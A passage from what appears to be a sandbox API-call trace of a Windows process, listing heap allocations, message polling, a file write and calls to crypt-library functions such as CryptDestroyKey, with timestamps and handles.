lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0141.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0141.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0141.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0141.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0141.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0141.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0141.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0141.595] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0141.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0141.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0141.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0141.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0141.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0141.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0141.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0141.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0141.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0141.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0141.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0141.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x185b0) returned 0x2ec9458 [0141.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0141.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0141.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0141.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0141.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0141.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0141.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0141.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0141.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0141.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0141.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0141.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x185b0) returned 0x2ee1a10 [0141.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec9458 | out: hHeap=0x970000) returned 1 [0141.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0141.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0141.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0141.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0141.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0141.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0141.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0141.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0141.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0141.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0141.605] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0141.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0141.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0141.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0141.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0141.605] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0141.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0141.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0141.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0141.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0141.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.606] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0141.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.606] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0141.606] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0141.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0141.606] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0141.606] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0141.606] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0141.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0141.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.719] WriteFile (in: hFile=0x2d0, lpBuffer=0x3be0048*, nNumberOfBytesToWrite=0x185b0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesWritten=0x8cf5e4*=0x185b0, lpOverlapped=0x0) returned 1 [0141.723] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.723] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0141.723] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0141.723] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0141.723] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0141.723] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0141.723] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0141.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0141.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e509b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0141.724] CryptDestroyKey (hKey=0xa87250) returned 1 [0141.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0141.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0141.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0141.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0141.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0141.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0141.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0141.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0141.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0141.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0141.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0141.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0141.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0141.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0141.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0141.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0141.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0141.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0141.726] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0141.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0141.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0141.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0141.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0141.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0141.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0141.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0141.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0141.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0141.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0141.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0141.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0141.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0141.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0141.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0141.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0141.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0141.727] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0141.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0141.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0141.727] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0141.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0141.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0141.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0141.727] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0141.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0141.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0141.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0141.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0141.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0141.728] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0141.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0141.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0141.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0141.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0141.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0141.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0141.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0141.729] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0141.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0141.729] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0141.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0141.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0141.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0141.729] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0141.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0141.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0141.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0141.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0141.730] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0141.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0141.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0141.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0141.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0141.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0141.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0141.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0141.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0141.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0141.730] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0141.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0141.730] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, 